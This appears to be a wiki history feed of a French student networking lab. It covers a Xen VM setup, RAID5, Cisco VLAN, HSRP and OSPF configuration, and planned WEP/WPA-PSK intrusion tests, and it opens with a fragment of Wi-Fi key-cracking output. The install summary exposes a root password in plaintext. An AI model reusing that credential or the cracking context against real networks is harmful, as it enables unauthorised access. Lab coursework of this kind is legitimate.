                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51254</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51254"/>
				<updated>2019-11-28T09:52:35Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Utilisation de AirCrack pour clef WPA-PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
